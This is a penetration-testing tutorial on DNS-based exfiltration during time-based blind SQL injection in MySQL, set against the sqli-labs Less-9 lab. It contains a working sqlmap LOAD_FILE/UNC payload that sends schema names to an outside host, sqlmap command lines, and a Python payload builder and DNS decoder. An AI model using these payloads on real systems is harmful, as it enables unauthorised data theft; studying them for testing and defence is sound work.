In day-to-day penetration testing we often run into time-based blind SQL injection. It is slow by nature (one boolean answer per request, each of which has to wait out the delay) and every round trip is also subject to network jitter. DNS exfiltration, usually called DNS log injection, can speed extraction up considerably, but the environment imposes several conditions that limit where it works in practice.
You need a domain whose NS record points at a VPS you control, or an account on a third-party DNS log platform that gives you a subdomain and shows you the queries it receives.
Prerequisites for DNS log injection
- It only works when the MySQL server runs on Windows: the technique relies on LOAD_FILE() opening a UNC path (\\host\share\file), which makes Windows resolve the host name before it tries to connect over SMB. MySQL on Linux does not treat such a path as a network path, so no lookup happens.
- secure_file_priv must be the empty string.
- The database user needs the FILE privilege; without it LOAD_FILE() returns NULL regardless of the path.
The second point is not the default configuration: since MySQL 5.7 the server ships with secure_file_priv set to a specific directory or to NULL, so the technique only applies where an administrator has relaxed it.
Meaning of secure_file_priv
- When secure_file_priv is NULL, mysqld refuses all file import/export (LOAD_FILE(), LOAD DATA, SELECT ... INTO OUTFILE)
- When secure_file_priv is a directory such as /tmp/, mysqld allows import/export only for files inside that directory
- When secure_file_priv is the empty string, mysqld does not restrict import/export at all
Set it in my.ini (my.cnf on Linux) under [mysqld] as secure_file_priv="" and restart the service; the variable is read-only at runtime, so it cannot be changed with SET GLOBAL. Check the effective value with SHOW VARIABLES LIKE 'secure_file_priv' before relying on it.



If the variable is not empty (NULL, or a directory that does not contain the UNC path), LOAD_FILE() simply returns NULL and no DNS request is ever made.
Manual DNS log injection
DNS log injection needs something to receive the exfiltrated names. That does not have to be a third-party platform: sqlmap ships its own DNS receiver, which you can run on a VPS that is the authoritative nameserver for your domain.
The module lives in sqlmap's source tree at ./lib/request/dns.py
Run it as root (it binds UDP port 53) and it prints the names of the DNS queries it receives.
[root@VM-4-7-centos ~]# cd sqlmap/
[root@VM-4-7-centos sqlmap]# ls
data  doc  extra  lib  LICENSE  plugins  README.md  sqlmapapi.py  sqlmapapi.yaml  sqlmap.conf  sqlmap.py  tamper  thirdparty
[root@VM-4-7-centos sqlmap]# python3 ./lib/request/dns.py

Using the DNS log exfiltration method, we obtained the current database name and database version information.
Using the --dns-domain parameter in sqlmap for injection
Take Less-9 of sqli-labs as the example. The only technique that works on this level is time-based blind injection, which is far too slow for anything beyond a few values, so switching to DNS log injection speeds extraction up considerably.
python3 sqlmap.py -u "http://YOUR-URL/sqli/Less-9/?id=1*" --batch --dns-domain=YOUR-DOMAIN -v3 --dbs

Here I used my own domain name; its NS record must point at the IP of this VPS, and sqlmap itself must run as root, because with --dns-domain it starts the DNS listener from lib/request/dns.py on port 53 rather than relying on an external log platform.
If the target does not support DNS log injection, sqlmap will report an error:
[ERROR] data retrieval through DNS channel failed. Turning off DNS exfiltration support
Payload analysis
1 AND ( SELECT 8357 FROM ( SELECT SLEEP(5 - IF(ORD(MID(( SELECT LOAD_FILE(CONCAT('\\\\jLp.', ( SELECT HEX(MID(DISTINCT(IFNULL(CAST(schema_name AS NCHAR), 0x20)), 1, 31)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4, 1 ),'.uYO.ack.red\\JCKK')) ), 9, 1)) > 327, 0, 5)) ) OSfI )-- EVDk
sqlmap encodes the queried value into a subdomain label. The inner query takes up to 31 characters of the value (MID(..., 1, 31); LIMIT 4, 1 selects the fifth schema name), HEX() turns them into characters that are legal in a DNS name, and CONCAT() wraps the result in a UNC path. After MySQL has processed the string escapes, the path the server tries to open for the payload above is:
\\jLp.<hex of the 31-character chunk>.uYO.ack.red\JCKK
Windows resolves the host part of the UNC path before it tries to connect, so a query for jLp.<hex>.uYO.ack.red reaches the authoritative server for ack.red whether or not the SMB connection ever succeeds. The random labels jLp and uYO mark the request so the receiver can match an incoming name to the query that produced it, and the chunk length of 31 keeps the hex label (62 characters) within the 63-octet limit of a single DNS label. Subsequent requests advance the MID() offset by 31 until a short chunk comes back, and the receiver hex-decodes and concatenates the chunks into the complete value. Because the injection point here is time-based, the LOAD_FILE() call is nested inside the SLEEP(...) wrapper of the working technique; the DNS request fires as soon as the inner query is evaluated, so no timing measurement is needed to read the result.
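To make both halves of this concrete, the receiver side that dns.py implements and the payload structure analysed above, here is an added example that is not sqlmap's own code. It builds a simplified LOAD_FILE(CONCAT(...)) expression of the same shape, constructs the DNS query packet that Windows would send for the UNC host, parses the QNAME out of it the way a port-53 listener must, and reassembles the hex chunks. The domain example.com, the markers jLp and uYO, the share name JCKK and the packets themselves are constructed here for illustration; only the 31-character chunk and the 63-octet label limit come from the page and RFC 1035.

```python
"""Added example (not sqlmap's own code): build a sqlmap-style LOAD_FILE()
exfiltration payload and decode the DNS query names it produces on the
receiving side.  example.com, the markers jLp/uYO, the share name and the
DNS packets are constructed here for illustration."""
import secrets
import string
import struct

LABEL_LIMIT = 63   # RFC 1035: a single DNS label is at most 63 octets
CHUNK = 31         # 31 characters hex-encode to 62 octets, the largest chunk that fits one label


def random_marker(length=3):
    """Random alphabetic marker, like sqlmap's jLp / uYO, that ties a query name to a request."""
    return "".join(secrets.choice(string.ascii_letters) for _ in range(length))


def build_payload(subquery, domain, prefix, suffix, share, offset=1, chunk=CHUNK):
    r"""Simplified form of the expression sqlmap nests inside the working injection technique.
    '\\\\' in the SQL literal becomes '\\' after MySQL escape processing, so the server
    tries to open the UNC path \\<prefix>.<hex>.<suffix>.<domain>\<share> and Windows
    resolves <prefix>.<hex>.<suffix>.<domain> first."""
    return (
        r"SELECT LOAD_FILE(CONCAT('\\\\%s.',"
        r"(SELECT HEX(MID((%s),%d,%d))),"
        r"'.%s.%s\\%s'))"
    ) % (prefix, subquery, offset, chunk, suffix, domain, share)


def build_dns_query(qname, txid=0x1234):
    """Constructed UDP payload of an A query for qname, as a resolver would send it to the
    authoritative server.  Raises ValueError for a label longer than the DNS limit."""
    question = b""
    for label in qname.split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) <= LABEL_LIMIT:
            raise ValueError("bad label length %d in %r" % (len(raw), label))
        question += bytes([len(raw)]) + raw
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags: RD=1; one question
    return header + question + b"\x00" + struct.pack(">HH", 1, 1)  # QTYPE A, QCLASS IN


def parse_qname(packet):
    """Read QNAME from the question section of a raw DNS query (what a port-53 listener sees)."""
    labels, pos = [], 12  # the DNS header is a fixed 12 bytes
    while packet[pos]:
        length = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    return ".".join(labels)


def extract_chunk(qname, prefix, suffix, domain):
    """Return the decoded chunk carried by qname, or None if the name is not one of ours.
    Comparisons are case-insensitive: resolvers may randomise label case (0x20 encoding),
    and hex digits decode the same in either case."""
    head, tail = prefix.lower() + ".", ".%s.%s" % (suffix.lower(), domain.lower())
    low = qname.lower()
    if not (low.startswith(head) and low.endswith(tail)):
        return None
    hexpart = qname[len(head):len(qname) - len(tail)]
    return bytes.fromhex(hexpart).decode("utf-8")


def simulate_exfiltration(value, domain, chunk=CHUNK):
    """Run the whole loop offline: the 'database' evaluates HEX(MID(value, offset, chunk)),
    'Windows' looks up the UNC host, and the 'receiver' reassembles the chunks.
    Returns (recovered value, list of query names seen)."""
    prefix, suffix = random_marker(), random_marker()
    recovered, seen, offset = "", [], 1
    while True:
        piece = value[offset - 1:offset - 1 + chunk]   # what MID(value, offset, chunk) yields
        if not piece:
            break
        qname = "%s.%s.%s.%s" % (prefix, piece.encode("utf-8").hex().upper(), suffix, domain)
        packet = build_dns_query(qname)                # the lookup Windows performs for the host
        seen.append(parse_qname(packet))
        recovered += extract_chunk(seen[-1], prefix, suffix, domain)
        if len(piece) < chunk:                         # a short chunk means the value is complete
            break
        offset += chunk
    return recovered, seen


if __name__ == "__main__":
    print(build_payload("SELECT @@version", "example.com", "jLp", "uYO", "JCKK"))
    print(simulate_exfiltration("information_schema", "example.com"))
```

The label-length check in build_dns_query is the reason sqlmap stops at 31 characters per request: a 32-character chunk hex-encodes to 64 octets and can no longer be carried in one label. The case-insensitive matching in extract_chunk matters on a real listener, because some resolvers randomise the case of the name they forward, and a receiver that compares markers byte-for-byte would silently drop those chunks.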
Priority issue of DNS log injection
[WARNING] option '--dns-domain' will be ignored as faster techniques are usable (EU)
When --dns-domain is given but sqlmap finds that faster techniques work on the injection point, it ignores the DNS channel and uses those instead. The letters in parentheses are sqlmap's technique codes; EU means error-based and UNION query injection were both usable, and since each of those returns data directly in the HTTP response, they beat one DNS round trip per 31-character chunk. DNS exfiltration is only worth it when the remaining techniques are boolean-based or time-based blind.
